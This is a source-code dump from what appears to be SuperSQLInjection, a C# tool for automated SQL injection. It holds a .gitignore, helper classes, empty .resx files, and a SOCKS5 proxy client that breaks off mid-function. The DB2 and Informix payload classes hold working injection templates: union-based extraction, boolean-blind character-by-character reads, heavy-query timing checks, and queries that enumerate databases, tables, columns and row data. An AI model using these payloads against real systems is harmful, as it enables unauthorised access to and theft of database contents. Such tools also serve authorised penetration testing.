[Ee]xpress/ 125 | 126 | # DocProject is a documentation generator add-in 127 | DocProject/buildhelp/ 128 | DocProject/Help/*.HxT 129 | DocProject/Help/*.HxC 130 | DocProject/Help/*.hhc 131 | DocProject/Help/*.hhk 132 | DocProject/Help/*.hhp 133 | DocProject/Help/Html2 134 | DocProject/Help/html 135 | 136 | # Click-Once directory 137 | publish/ 138 | 139 | # Publish Web Output 140 | *.[Pp]ublish.xml 141 | *.azurePubxml 142 | 143 | # TODO: Un-comment the next line if you do not want to checkin 144 | # your web deploy settings because they may include unencrypted 145 | # passwords 146 | #*.pubxml 147 | *.publishproj 148 | 149 | # NuGet Packages 150 | *.nupkg 151 | # The packages folder can be ignored because of Package Restore 152 | **/packages/* 153 | # except build/, which is used as an MSBuild target. 154 | !**/packages/build/ 155 | # Uncomment if necessary however generally it will be regenerated when needed 156 | #!**/packages/repositories.config 157 | # NuGet v3's project.json files produces more ignoreable files 158 | *.nuget.props 159 | *.nuget.targets 160 | 161 | # Microsoft Azure Build Output 162 | csx/ 163 | *.build.csdef 164 | 165 | # Microsoft Azure Emulator 166 | ecf/ 167 | rcf/ 168 | 169 | # Windows Store app package directory 170 | AppPackages/ 171 | BundleArtifacts/ 172 | 173 | # Visual Studio cache files 174 | # files ending in .cache can be ignored 175 | *.[Cc]ache 176 | # but keep track of directories ending in .cache 177 | !*.[Cc]ache/ 178 | 179 | # Others 180 | ClientBin/ 181 | [Ss]tyle[Cc]op.* 182 | ~$* 183 | *~ 184 | *.dbmdl 185 | *.dbproj.schemaview 186 | *.pfx 187 | *.publishsettings 188 | node_modules/ 189 | orleans.codegen.cs 190 | 191 | # RIA/Silverlight projects 192 | Generated_Code/ 193 | 194 | # Backup & report files from converting an old project file 195 | # to a newer Visual Studio version. 
Backup files are not needed, 196 | # because we have git ;-) 197 | _UpgradeReport_Files/ 198 | Backup*/ 199 | UpgradeLog*.XML 200 | UpgradeLog*.htm 201 | 202 | # SQL Server files 203 | *.mdf 204 | *.ldf 205 | 206 | # Business Intelligence projects 207 | *.rdl.data 208 | *.bim.layout 209 | *.bim_*.settings 210 | 211 | # Microsoft Fakes 212 | FakesAssemblies/ 213 | 214 | # GhostDoc plugin setting file 215 | *.GhostDoc.xml 216 | 217 | # Node.js Tools for Visual Studio 218 | .ntvs_analysis.dat 219 | 220 | # Visual Studio 6 build log 221 | *.plg 222 | 223 | # Visual Studio 6 workspace options file 224 | *.opt 225 | 226 | # Visual Studio LightSwitch build output 227 | **/*.HTMLClient/GeneratedArtifacts 228 | **/*.DesktopClient/GeneratedArtifacts 229 | **/*.DesktopClient/ModelManifest.xml 230 | **/*.Server/GeneratedArtifacts 231 | **/*.Server/ModelManifest.xml 232 | _Pvt_Extensions 233 | 234 | # LightSwitch generated files 235 | GeneratedArtifacts/ 236 | ModelManifest.xml 237 | 238 | # Paket dependency manager 239 | .paket/paket.exe 240 | 241 | # FAKE - F# Make 242 | .fake/ 243 | -------------------------------------------------------------------------------- /SuperSQLInjection/payload/DB2.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Text; 4 | using tools; 5 | 6 | namespace SuperSQLInjection.payload 7 | { 8 | class DB2 9 | { 10 | //加载对应配置(需要读取的环境变量) 11 | public static String path = "config/vers/db2.txt"; 12 | public static List vers = FileTool.readFileToList(path); 13 | 14 | //数据库数量 15 | public static String dbs_count = "(select count(1) from sysibm.sysschemata)"; 16 | //表数量 17 | public static String tables_count = "(select count(1) from sysibm.systables where creator='{dbname}')"; 18 | //列数量 19 | public static String columns_count = "(select count(1) from sysibm.syscolumns where tbcreator='{dbname}' and tbname='{table}')"; 20 | 21 | 22 | //获取数据库名 23 | public 
static String db_value = "(select name from (select name,rownumber() over() rownum from sysibm.sysschemata) t where t.rownum={index})"; 24 | //获取表名称 25 | public static String table_value = "(select name from (select name,rownumber() over() rownum from sysibm.systables where creator='{dbname}') t where t.rownum={index})"; 26 | //获取列名称 27 | public static String column_value = "(select name from (select name,rownumber() over() rownum from sysibm.syscolumns where tbcreator='{dbname}' and tbname='{table}') t where t.rownum={index})"; 28 | 29 | 30 | //获取数据库数量bool方式 31 | public static String bool_db_count = " " + dbs_count + ">{len}"; 32 | //获取表数量bool 33 | public static String bool_tables_count = " " + tables_count + ">{len}"; 34 | //获取列数量bool 35 | public static String bool_columns_count = " " + columns_count + ">{len}"; 36 | 37 | 38 | 39 | public static String substr = "substr(({data})),{index},1)"; 40 | //多字节 41 | public static String hex_value = "hex({data})"; 42 | 43 | //bool方式字符长度判断 44 | public static String bool_length = " length(rtrim(({data})))>{len}"; 45 | 46 | //bool方式获取值 47 | public static String bool_value = " ascii(substr({data},{index},1))>{len}"; 48 | 49 | public static String cast_value = "coalesce(rtrim(cast({data} as char(254))),chr(32))"; 50 | 51 | //获取行数据 52 | public static String data_value = "(select "+ cast_value + " from (select {allcolumns},rownumber() over() rownum from {dbname}.{table}) t where t.rownum={index})"; 53 | 54 | //获取行数据 55 | public static String data_no_cast_value = "(select {data} from (select {allcolumns},rownumber() over() rownum from {dbname}.{table}) t where t.rownum={index})"; 56 | 57 | 58 | //union获取数据条数 59 | public static String data_count = "(select count(1) from {dbname}.{table})"; 60 | 61 | public static String bool_datas_count = " " + data_count + ">={len}"; 62 | 63 | //union获取值 64 | public static String union_value = " 1=2 union all select {data} from sysibm.sysdummy1"; 65 | 66 | public static String 
getUnionDataValue(String unionFileTemplate, String dataPayLoad, String dbname, String table, String index) 67 | { 68 | String temlate=unionFileTemplate.Replace("{data}", "(chr(94)||chr(94)||chr(33)||" + cast_value.Replace("{data}", dataPayLoad.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index)) + "||chr(33)||chr(94)||chr(94))"); 69 | return union_value.Replace("{data}", temlate); 70 | } 71 | 72 | public static String unionColumns(List columns, String unionStr) 73 | { 74 | StringBuilder sb = new StringBuilder(); 75 | foreach (String column in columns) 76 | { 77 | sb.Append(cast_value.Replace("{data}", column) + unionStr); 78 | } 79 | sb.Remove(sb.Length - unionStr.Length, unionStr.Length); 80 | return sb.ToString(); 81 | } 82 | 83 | public static String getUnionDataValue(String unionFileTemplate, List columns, String dbname, String table, String index) 84 | { 85 | String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns,"||chr(36)||chr(9)||chr(36)||") + "||chr(33)||chr(94)||chr(94)"; 86 | String template= unionFileTemplate.Replace("{data}", (data_no_cast_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index))); 87 | return union_value.Replace("{data}", template); 88 | } 89 | 90 | /// 91 | /// 获得bool方式值payload 92 | /// 93 | /// 对应值的查询SQL 94 | /// 数据库名 95 | /// 表名 96 | /// 下标 97 | /// 98 | public static String getBoolDataPayLoad(String column, String dbName, String table, int index) 99 | { 100 | String payload = data_value.Replace("{data}", column).Replace("{allcolumns}", column).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index.ToString()); 101 | return payload; 102 | } 103 | } 104 | } 105 | -------------------------------------------------------------------------------- /SuperSQLInjection/tools/XML.cs: -------------------------------------------------------------------------------- 1 | 
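using System;
using System.Collections.Generic;
using System.Text;
using System.Xml;
using SuperSQLInjection.model;
using System.IO;
using System.Xml.Serialization;
using System.Windows.Forms;
using tools;

namespace SuperSQLInjection.tools
{
    /// <summary>
    /// File-based XML persistence helpers built on <see cref="XmlSerializer"/>.
    /// Every save method overwrites the target file; every read method parses
    /// the file with DTD processing and external resolution switched off.
    /// </summary>
    class XML
    {
        /// <summary>
        /// Builds an in-memory XML document that contains only the XML
        /// declaration. Nothing is written to disk here.
        /// </summary>
        /// <returns>Always <c>true</c>.</returns>
        public static Boolean SaveMyConfig()
        {
            XmlDocument doc = new XmlDocument();
            XmlDeclaration declaration = doc.CreateXmlDeclaration("1.0", "UTF-8", null);
            doc.AppendChild(declaration);
            return true;
        }

        /// <summary>
        /// Serializes <paramref name="config"/> to <paramref name="fileName"/>,
        /// replacing any existing file.
        /// </summary>
        /// <param name="fileName">Path of the file to create or overwrite.</param>
        /// <param name="config">Configuration object to serialize.</param>
        public static void saveConfig(String fileName, Config config)
        {
            WriteXml(fileName, typeof(Config), config);
        }

        /// <summary>
        /// Serializes <paramref name="obj"/> to <paramref name="fileName"/> using
        /// the object's runtime type, replacing any existing file.
        /// </summary>
        /// <param name="fileName">Path of the file to create or overwrite.</param>
        /// <param name="obj">Object to serialize; must not be null.</param>
        /// <exception cref="ArgumentNullException"><paramref name="obj"/> is null.</exception>
        public static void saveObject(String fileName, Object obj)
        {
            // Reject null before the file is opened: FileMode.Create truncates the
            // target, so failing later would destroy the previously saved data.
            if (obj == null)
            {
                throw new ArgumentNullException("obj");
            }
            WriteXml(fileName, obj.GetType(), obj);
        }

        /// <summary>
        /// Loads a <see cref="Config"/> from <paramref name="configPath"/>.
        /// </summary>
        /// <param name="configPath">Path of the XML configuration file.</param>
        /// <returns>
        /// The deserialized configuration, or a default-constructed
        /// <see cref="Config"/> when the file cannot be read or parsed
        /// (the failure is logged, not rethrown).
        /// </returns>
        public static Config readConfig(String configPath)
        {
            Config config = new Config();
            try
            {
                config = (Config)ReadXml(configPath, typeof(Config));
            }
            catch (Exception e)
            {
                // Deliberate best-effort: fall back to defaults and record why.
                Tools.SysLog(configPath+" 读取错误!"+e.Message);
            }
            return config;
        }

        /// <summary>
        /// Loads an object of the same runtime type as <paramref name="obj"/>
        /// from <paramref name="configPath"/>.
        /// </summary>
        /// <param name="configPath">Path of the XML file to read.</param>
        /// <param name="obj">Instance used only to select the target type; must not be null.</param>
        /// <returns>The deserialized object.</returns>
        /// <exception cref="ArgumentNullException"><paramref name="obj"/> is null.</exception>
        public static Object readObject(String configPath, Object obj)
        {
            if (obj == null)
            {
                throw new ArgumentNullException("obj");
            }
            return ReadXml(configPath, obj.GetType());
        }

        /// <summary>
        /// Serializes <paramref name="dbs"/> to <paramref name="fileName"/>,
        /// replacing any existing file.
        /// </summary>
        /// <param name="fileName">Path of the file to create or overwrite.</param>
        /// <param name="dbs">Database model to serialize.</param>
        public static void saveDBS(String fileName, DataBase dbs)
        {
            WriteXml(fileName, typeof(DataBase), dbs);
        }

        /// <summary>
        /// Loads a <see cref="DataBase"/> from <paramref name="path"/>.
        /// </summary>
        /// <param name="path">Path of the XML file to read.</param>
        /// <returns>The deserialized database model.</returns>
        public static DataBase readDBS(String path)
        {
            return (DataBase)ReadXml(path, typeof(DataBase));
        }

        /// <summary>
        /// Writes <paramref name="value"/> as XML of the given type to a freshly
        /// created file. Exceptions propagate with their original stack trace.
        /// </summary>
        private static void WriteXml(String fileName, Type type, Object value)
        {
            // The stream is disposed on every path, including serializer failures.
            using (Stream stream = new FileStream(fileName, FileMode.Create, FileAccess.ReadWrite))
            {
                // The serializer has to be told the type it is writing.
                XmlSerializer serializer = new XmlSerializer(type);
                serializer.Serialize(stream, value);
            }
        }

        /// <summary>
        /// Reads an object of the given type from an XML file. Exceptions
        /// propagate with their original stack trace.
        /// </summary>
        private static Object ReadXml(String path, Type type)
        {
            // The serializer has to be told the type it is reading.
            XmlSerializer serializer = new XmlSerializer(type);

            // Reading needs no write permission, so open the file read-only.
            using (Stream stream = new FileStream(path, FileMode.Open, FileAccess.Read))
            using (XmlTextReader reader = new XmlTextReader(stream))
            {
                // Saved files may be imported from elsewhere, so treat them as
                // untrusted: a DOCTYPE is rejected and no external entity or
                // schema is ever fetched. Files written by XmlSerializer carry
                // no DTD, so legitimate files still load.
                // NOTE(review): DtdProcessing needs .NET Framework 4.0 or later -
                // confirm the project's target framework.
                reader.DtdProcessing = DtdProcessing.Prohibit;
                reader.XmlResolver = null;
                reader.Normalization = false;
                return serializer.Deserialize(reader);
            }
        }
    }
}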
-------------------------------------------------------------------------------- /SuperSQLInjection/tools/smartthread/WIGStartInfo.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | 3 | namespace Amib.Threading 4 | { 5 | /// 6 | /// Summary description for WIGStartInfo. 7 | /// 8 | public class WIGStartInfo 9 | { 10 | private bool _useCallerCallContext; 11 | private bool _useCallerHttpContext; 12 | private bool _disposeOfStateObjects; 13 | private CallToPostExecute _callToPostExecute; 14 | private PostExecuteWorkItemCallback _postExecuteWorkItemCallback; 15 | private bool _startSuspended; 16 | private WorkItemPriority _workItemPriority; 17 | private bool _fillStateWithArgs; 18 | 19 | protected bool _readOnly; 20 | 21 | public WIGStartInfo() 22 | { 23 | _fillStateWithArgs = SmartThreadPool.DefaultFillStateWithArgs; 24 | _workItemPriority = SmartThreadPool.DefaultWorkItemPriority; 25 | _startSuspended = SmartThreadPool.DefaultStartSuspended; 26 | _postExecuteWorkItemCallback = SmartThreadPool.DefaultPostExecuteWorkItemCallback; 27 | _callToPostExecute = SmartThreadPool.DefaultCallToPostExecute; 28 | _disposeOfStateObjects = SmartThreadPool.DefaultDisposeOfStateObjects; 29 | _useCallerHttpContext = SmartThreadPool.DefaultUseCallerHttpContext; 30 | _useCallerCallContext = SmartThreadPool.DefaultUseCallerCallContext; 31 | } 32 | 33 | public WIGStartInfo(WIGStartInfo wigStartInfo) 34 | { 35 | _useCallerCallContext = wigStartInfo.UseCallerCallContext; 36 | _useCallerHttpContext = wigStartInfo.UseCallerHttpContext; 37 | _disposeOfStateObjects = wigStartInfo.DisposeOfStateObjects; 38 | _callToPostExecute = wigStartInfo.CallToPostExecute; 39 | _postExecuteWorkItemCallback = wigStartInfo.PostExecuteWorkItemCallback; 40 | _workItemPriority = wigStartInfo.WorkItemPriority; 41 | _startSuspended = wigStartInfo.StartSuspended; 42 | _fillStateWithArgs = wigStartInfo.FillStateWithArgs; 43 | } 44 | 45 | protected void 
ThrowIfReadOnly() 46 | { 47 | if (_readOnly) 48 | { 49 | throw new NotSupportedException("This is a readonly instance and set is not supported"); 50 | } 51 | } 52 | 53 | /// 54 | /// Get/Set if to use the caller's security context 55 | /// 56 | public virtual bool UseCallerCallContext 57 | { 58 | get { return _useCallerCallContext; } 59 | set 60 | { 61 | ThrowIfReadOnly(); 62 | _useCallerCallContext = value; 63 | } 64 | } 65 | 66 | 67 | /// 68 | /// Get/Set if to use the caller's HTTP context 69 | /// 70 | public virtual bool UseCallerHttpContext 71 | { 72 | get { return _useCallerHttpContext; } 73 | set 74 | { 75 | ThrowIfReadOnly(); 76 | _useCallerHttpContext = value; 77 | } 78 | } 79 | 80 | 81 | /// 82 | /// Get/Set if to dispose of the state object of a work item 83 | /// 84 | public virtual bool DisposeOfStateObjects 85 | { 86 | get { return _disposeOfStateObjects; } 87 | set 88 | { 89 | ThrowIfReadOnly(); 90 | _disposeOfStateObjects = value; 91 | } 92 | } 93 | 94 | 95 | /// 96 | /// Get/Set the run the post execute options 97 | /// 98 | public virtual CallToPostExecute CallToPostExecute 99 | { 100 | get { return _callToPostExecute; } 101 | set 102 | { 103 | ThrowIfReadOnly(); 104 | _callToPostExecute = value; 105 | } 106 | } 107 | 108 | 109 | /// 110 | /// Get/Set the default post execute callback 111 | /// 112 | public virtual PostExecuteWorkItemCallback PostExecuteWorkItemCallback 113 | { 114 | get { return _postExecuteWorkItemCallback; } 115 | set 116 | { 117 | ThrowIfReadOnly(); 118 | _postExecuteWorkItemCallback = value; 119 | } 120 | } 121 | 122 | 123 | /// 124 | /// Get/Set if the work items execution should be suspended until the Start() 125 | /// method is called. 
126 | /// 127 | public virtual bool StartSuspended 128 | { 129 | get { return _startSuspended; } 130 | set 131 | { 132 | ThrowIfReadOnly(); 133 | _startSuspended = value; 134 | } 135 | } 136 | 137 | 138 | /// 139 | /// Get/Set the default priority that a work item gets when it is enqueued 140 | /// 141 | public virtual WorkItemPriority WorkItemPriority 142 | { 143 | get { return _workItemPriority; } 144 | set { _workItemPriority = value; } 145 | } 146 | 147 | /// 148 | /// Get/Set the if QueueWorkItem of Action<...>/Func<...> fill the 149 | /// arguments as an object array into the state of the work item. 150 | /// The arguments can be access later by IWorkItemResult.State. 151 | /// 152 | public virtual bool FillStateWithArgs 153 | { 154 | get { return _fillStateWithArgs; } 155 | set 156 | { 157 | ThrowIfReadOnly(); 158 | _fillStateWithArgs = value; 159 | } 160 | } 161 | 162 | /// 163 | /// Get a readonly version of this WIGStartInfo 164 | /// 165 | /// Returns a readonly reference to this WIGStartInfoRO 166 | public WIGStartInfo AsReadOnly() 167 | { 168 | return new WIGStartInfo(this) { _readOnly = true }; 169 | } 170 | } 171 | } 172 | -------------------------------------------------------------------------------- /SuperSQLInjection/AddNode.resx: -------------------------------------------------------------------------------- 1 | 2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | 
-------------------------------------------------------------------------------- /SuperSQLInjection/Seting.resx: -------------------------------------------------------------------------------- 1 | 2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | -------------------------------------------------------------------------------- /SuperSQLInjection/Waring.resx: -------------------------------------------------------------------------------- 1 | 2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | -------------------------------------------------------------------------------- /SuperSQLInjection/FindString.resx: -------------------------------------------------------------------------------- 1 | 2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 
101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | -------------------------------------------------------------------------------- /SuperSQLInjection/ShowResponse.resx: -------------------------------------------------------------------------------- 1 | 2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | -------------------------------------------------------------------------------- /SuperSQLInjection/payload/Informix.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Text; 4 | using tools; 5 | 6 | namespace SuperSQLInjection.payload 7 | { 8 | class Informix 9 | { 10 | //加载对应配置(需要读取的环境变量) 11 | public static String path = "config/vers/informix.txt"; 12 | public static List vers = FileTool.readFileToList(path); 13 | 14 | //数据库数量 15 | public static String dbs_count = "(select count(*) from sysmaster:sysdatabases)"; 16 | //表数量 17 | public static String tables_count = "(select count(*) from {dbname}:systables where tabtype='T' and tabid>99)"; 18 | //列数量 19 | public static String 
columns_count = "(select count(*) from {dbname}:systables t,{dbname}:syscolumns c where t.tabid=c.tabid and t.tabname='{table}')"; 20 | 21 | 22 | //获取数据库名 23 | public static String db_value = "(select name from (select skip {index} first 1 name from sysmaster:sysdatabases))"; 24 | //获取表名称 25 | public static String table_value = "(select tabname from (select skip {index} first 1 tabname from {dbname}:systables where tabtype='T' and tabid>99))"; 26 | //获取列名称 27 | public static String column_value = "(select colname from (select skip {index} first 1 colname from {dbname}:systables t,{dbname}:syscolumns c where t.tabid=c.tabid and t.tabname='{table}'))"; 28 | 29 | 30 | //获取数据库数量bool方式 31 | public static String bool_db_count = " " + dbs_count + ">{len}"; 32 | //获取表数量bool 33 | public static String bool_tables_count = " " + tables_count + ">{len}"; 34 | //获取列数量bool 35 | public static String bool_columns_count = " " + columns_count + ">{len}"; 36 | 37 | 38 | 39 | public static String substr = "substr(({data})),{index},1)"; 40 | //多字节 41 | //public static String hex_value = "ascii({data})"; 42 | 43 | //bool方式字符长度判断 44 | public static String bool_length = " length(({data}))>{len}"; 45 | 46 | //bool方式获取值 47 | public static String bool_value = " ascii(substr({data},{index},1))>{len}"; 48 | //最大32767 49 | public static String cast_value = "rtrim(cast({data} as char(32767)))"; 50 | public static String no_cast_value = "({data})"; 51 | 52 | //获取行数据 53 | public static String data_value = "(select "+ cast_value + " from (select skip {index} first 1 {allcolumns} from {dbname}:{table}))"; 54 | 55 | //获取行数据 56 | public static String data_no_cast_value = "(select {data} from (select skip {index} first 1 {allcolumns} from {dbname}:{table}))"; 57 | 58 | 59 | //union获取数据条数 60 | public static String data_count = "(select count(*) from {dbname}:{table})"; 61 | 62 | public static String bool_datas_count = " " + data_count + ">={len}"; 63 | 64 | //union获取值 65 | public static String 
union_value = " 1=2 union all select {data} from sysmaster:sysdual"; 66 | 67 | 68 | public static String rand = Tools.RandNum(3); 69 | 70 | public static String start = rand + 0; 71 | public static String mid = rand + 5; 72 | public static String end = rand + 9; 73 | 74 | 75 | public static String getBoolDataBySleep(String data) 76 | { 77 | return " 1=(case when(" + data + ") then (select 1 from(select count(*) from sysmaster:syspaghdr)) else 1 end)"; 78 | } 79 | 80 | public static String getBoolCountBySleep(String data) 81 | { 82 | return " 1=(case when(" + data + ") then (select 1 from(select count(*) from sysmaster:syspaghdr)) else 1 end)"; 83 | } 84 | 85 | public static String getUnionDataValue(String unionFileTemplate, String dataPayLoad, String dbname, String table, String index,String castStr) 86 | { 87 | String temlate=unionFileTemplate.Replace("{data}", "(to_char("+start+ ")||to_char(" + start + ")||" + castStr.Replace("{data}", dataPayLoad.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index)) + "||to_char(" + end + ")||to_char(" + end + "))"); 88 | return union_value.Replace("{data}", temlate); 89 | } 90 | 91 | public static String unionColumns(List columns, String unionStr) 92 | { 93 | StringBuilder sb = new StringBuilder(); 94 | decimal c = 32000 / columns.Count; 95 | int max = (int)Math.Ceiling(c); 96 | 97 | foreach (String column in columns) 98 | { 99 | sb.Append(cast_value.Replace("32767", max.ToString()).Replace("{data}", column) + unionStr); 100 | } 101 | sb.Remove(sb.Length - unionStr.Length, unionStr.Length); 102 | return sb.ToString(); 103 | } 104 | 105 | public static String getUnionDataValue(String unionFileTemplate, List columns, String dbname, String table, String index) 106 | { 107 | String data = "to_char(" + start + ")||to_char(" + start + ")||" + unionColumns(columns,"||to_char("+ mid + ")||") + "||to_char(" + end + ")||to_char(" + end + ")"; 108 | String template= unionFileTemplate.Replace("{data}", 
(data_no_cast_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index))); 109 | return union_value.Replace("{data}", template); 110 | } 111 | 112 | /// 113 | /// 获得bool方式值payload 114 | /// 115 | /// 对应值的查询SQL 116 | /// 数据库名 117 | /// 表名 118 | /// 下标 119 | /// 120 | public static String getBoolDataPayLoad(String column, String dbName, String table, int index) 121 | { 122 | String payload = data_value.Replace("{data}", column).Replace("{allcolumns}", column).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index.ToString()); 123 | return payload; 124 | } 125 | } 126 | } 127 | -------------------------------------------------------------------------------- /SuperSQLInjection/tools/http/SocketProxy.cs: -------------------------------------------------------------------------------- 1 | using Amib.Threading.Internal; 2 | using System; 3 | using System.Collections.Generic; 4 | using System.Linq; 5 | using System.Net; 6 | using System.Net.Sockets; 7 | using System.Text; 8 | using tools; 9 | 10 | namespace SuperSQLInjection.tools.http 11 | { 12 | class SocketProxy 13 | { 14 | 15 | private static byte[] s5_hello = new Byte[] { 5, 1, 0 }; 16 | public int CreatProxyUseTime = 0; 17 | public int ConectProxyUseTime = 0; 18 | private Stopwatch sw = new Stopwatch(); 19 | public TcpClient creatProxySocket(string host, int port,int timeout) { 20 | try 21 | { 22 | TimeOutSocket ts = new TimeOutSocket(); 23 | TcpClient cilent=ts.Connect(host, port, timeout); 24 | TcpClient client = new TcpClient(); 25 | client.Connect(host, port); 26 | CreatProxyUseTime = ts.useTime; 27 | if (client.Connected) 28 | { 29 | return client; 30 | } 31 | else { 32 | client.Close(); 33 | } 34 | 35 | } 36 | catch (Exception e) { 37 | Tools.SysLog("creatProxySocket异常:" + e.Message); 38 | } 39 | return null; 40 | } 41 | 42 | public byte[] GetLoginByte(String username,String 
password) { 43 | 44 | byte[] bUser = Encoding.Default.GetBytes(username); 45 | byte[] bPass = Encoding.Default.GetBytes(password); 46 | 47 | int len = 3 + bUser.Length + bPass.Length; 48 | 49 | byte[] data = new Byte[len]; 50 | data[0] = 5; 51 | data[1] = (byte)bUser.Length; 52 | Array.Copy(bUser, 0, data, 2, bUser.Length); 53 | data[2 + bUser.Length] = (byte)bPass.Length; 54 | Array.Copy(bPass, 0, data, 3 + bUser.Length, bPass.Length); 55 | return data; 56 | } 57 | 58 | public byte[] GetConectTargetByte(String hsot, int port) 59 | { 60 | byte[] data = new byte[10]; 61 | data[0] = 5; 62 | data[1] = 1; 63 | data[2] = 0; 64 | data[3] = 1; 65 | 66 | IPAddress ipAdd = Dns.GetHostAddresses(hsot)[0]; 67 | string strIp = ipAdd.ToString(); 68 | string[] strAryTemp = strIp.Split(new char[] { '.' }); 69 | data[4] = Convert.ToByte(strAryTemp[0]); 70 | data[5] = Convert.ToByte(strAryTemp[1]); 71 | data[6] = Convert.ToByte(strAryTemp[2]); 72 | data[7] = Convert.ToByte(strAryTemp[3]); 73 | 74 | data[8] = (byte)(port / 256); 75 | data[9] = (byte)(port % 256); 76 | return data; 77 | } 78 | 79 | /// 80 | /// 测试连接代理服务器 81 | /// 82 | /// 83 | /// 84 | /// 85 | /// 86 | public bool ConnectProxyServer(string host, int port, TcpClient sProxyServer,String username,String password,int timeout) 87 | { 88 | try 89 | { 90 | sw.Start(); 91 | //构造Socks5代理服务器第一连接头(无用户名密码) 92 | byte[] bySock5Receive = new byte[10]; 93 | int readCount = 0; 94 | sProxyServer.ReceiveTimeout = (timeout * 1000) - CreatProxyUseTime; 95 | if (String.IsNullOrEmpty(username) && String.IsNullOrEmpty(password)) 96 | { 97 | sProxyServer.Client.Send(s5_hello, s5_hello.Length, SocketFlags.None); 98 | } 99 | else 100 | { 101 | byte[] login = GetLoginByte(username, password); 102 | sProxyServer.Client.Send(login, login.Length, SocketFlags.None); 103 | } 104 | readCount = sProxyServer.Client.Receive(bySock5Receive, bySock5Receive.Length, SocketFlags.None); 105 | if (readCount < 2) 106 | { 107 | throw new 
